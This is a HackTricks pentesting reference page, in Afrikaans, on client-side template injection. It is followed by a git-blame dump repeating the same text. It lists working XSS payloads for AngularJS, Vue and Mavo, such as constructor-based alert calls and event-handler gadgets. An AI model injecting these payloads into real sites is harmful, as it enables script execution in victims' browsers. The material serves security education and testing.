hacktricks/pentesting-web/client-side-template-injection-csti.md

# Client Side Template Injection (CSTI)

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


## Opsomming

Dit is soos 'n [**Server Side Template Injection**](ssti-server-side-template-injection/) maar in die **klant**. Die **SSTI** kan jou toelaat om **kode** op die afstandsbediener uit te voer, die **CSTI** kan jou toelaat om **arbitraire JavaScript** kode in die slagoffer se blaaier uit te voer.

**Toetsing** vir hierdie kwesbaarheid is baie **soortgelyk** aan die geval van **SSTI**, die interpreter verwag **'n sjabloon** en sal dit uitvoer. Byvoorbeeld, met 'n payload soos `{{ 7-7 }}`, as die app **kwesbaar** is, sal jy 'n `0` sien, en as nie, sal jy die oorspronklike sien: `{{ 7-7 }}`

## AngularJS

AngularJS is 'n wyd gebruikte JavaScript-raamwerk wat met HTML kommunikeer deur middel van eienskappe bekend as direkte, 'n noemenswaardige een is **`ng-app`**. Hierdie direkte laat AngularJS toe om die HTML-inhoud te verwerk, wat die uitvoering van JavaScript-uitdrukkings binne dubbele krulhake moontlik maak.

In scenario's waar gebruikersinvoer dinamies in die HTML-lichaam ingevoeg word wat met `ng-app` gemerk is, is dit moontlik om arbitraire JavaScript-kode uit te voer. Dit kan bereik word deur die sintaksis van AngularJS binne die invoer te benut. Hieronder is voorbeelde wat demonstreer hoe JavaScript-kode uitgevoer kan word:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)

{% hint style="danger" %}
[**Angular 1.6 het die sandbox verwyder**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so vanaf hierdie weergawe behoort 'n payload soos `{{constructor.constructor('alert(1)')()}}` of `<input ng-focus=$event.view.alert('XSS')>` te werk.
{% endhint %}

## VueJS

You can find a **vulnerable Vue** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)

And the **source code** of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
'n Regtig goeie pos oor CSTI in VUE kan gevind word in [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

### **V3**
```
{{_openBlock.constructor('alert(1)')()}}
```
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

### **V2**
```
{{constructor.constructor('alert(1)')()}}
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)

**Kyk meer VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)

## Mavo

Payload:
```
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**Meer payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)

## **Brute-Force Opsporing Lys**

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}


{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`# Client Side Template Injection (CSTI)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<summary>Ondersteun HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`* Kyk na die [subskripsie planne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-04-18 04:05:40 +00:00			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% endhint %}`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:37:31 +00:00

Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`## Opsomming`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`Dit is soos 'n [Server Side Template Injection](ssti-server-side-template-injection/) maar in die klant. Die SSTI kan jou toelaat om kode op die afstandsbediener uit te voer, die CSTI kan jou toelaat om arbitraire JavaScript kode in die slagoffer se blaaier uit te voer.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			Toetsing vir hierdie kwesbaarheid is baie soortgelyk aan die geval van SSTI, die interpreter verwag 'n sjabloon en sal dit uitvoer. Byvoorbeeld, met 'n payload soos `{{ 7-7 }}`, as die app kwesbaar is, sal jy 'n `0` sien, en as nie, sal jy die oorspronklike sien: `{{ 7-7 }}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`## AngularJS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			AngularJS is 'n wyd gebruikte JavaScript-raamwerk wat met HTML kommunikeer deur middel van eienskappe bekend as direkte, 'n noemenswaardige een is `ng-app`. Hierdie direkte laat AngularJS toe om die HTML-inhoud te verwerk, wat die uitvoering van JavaScript-uitdrukkings binne dubbele krulhake moontlik maak.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			In scenario's waar gebruikersinvoer dinamies in die HTML-lichaam ingevoeg word wat met `ng-app` gemerk is, is dit moontlik om arbitraire JavaScript-kode uit te voer. Dit kan bereik word deur die sintaksis van AngularJS binne die invoer te benut. Hieronder is voorbeelde wat demonstreer hoe JavaScript-kode uitgevoer kan word:
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```javascript
			`{{$on.constructor('alert(1)')()}}`
			`{{constructor.constructor('alert(1)')()}}`
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`<input ng-focus=$event.view.alert('XSS')>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`<!-- Google Research - AngularJS -->`
			`<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`You can find a very basic online example of the vulnerability in AngularJS in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`{% hint style="danger" %}`
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			[Angular 1.6 het die sandbox verwyder](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so vanaf hierdie weergawe behoort 'n payload soos `{{constructor.constructor('alert(1)')()}}` of `<input ng-focus=$event.view.alert('XSS')>` te werk.
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`{% endhint %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`## VueJS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`You can find a vulnerable Vue implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\`
			Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`And the source code of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
			`<!-- Google Research - Vue.js-->`
			"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`'n Regtig goeie pos oor CSTI in VUE kan gevind word in [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`
GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`### V3`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`{{_openBlock.constructor('alert(1)')()}}`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`### V2`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`{{constructor.constructor('alert(1)')()}}`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`Credit: [Mario Heiderich](https://twitter.com/cure53berlin)`
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`Kyk meer VUE payloads in [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)`
GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`## Mavo`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`Payload:`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2021-06-25 16:39:43 +00:00			`[7*7]`
			`[(1,alert)(1)]`
			`<div mv-expressions="{{ }}">{{top.alert(1)}}</div>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`[self.alert(1)]`
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`javascript:alert(1)%252f%252f..%252fcss-images`
			`[Omglol mod 1 mod self.alert (1) andlol]`
GitBook: [master] 3 pages modified 2021-06-25 16:39:43 +00:00			`[''=''or self.alert(lol)]`
			`<a data-mv-if='1 or self.alert(1)'>test</a>`
			`<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>`
			`<a href=[javascript&':alert(1)']>test</a>`
			`[self.alert(1)mod1]`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Meer payloads in [https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`## Brute-Force Opsporing Lys`
GitBook: [master] 10 pages modified 2021-06-27 21:56:13 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:37:31 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<summary>Ondersteun HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`* Kyk na die [subskripsie planne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% endhint %}`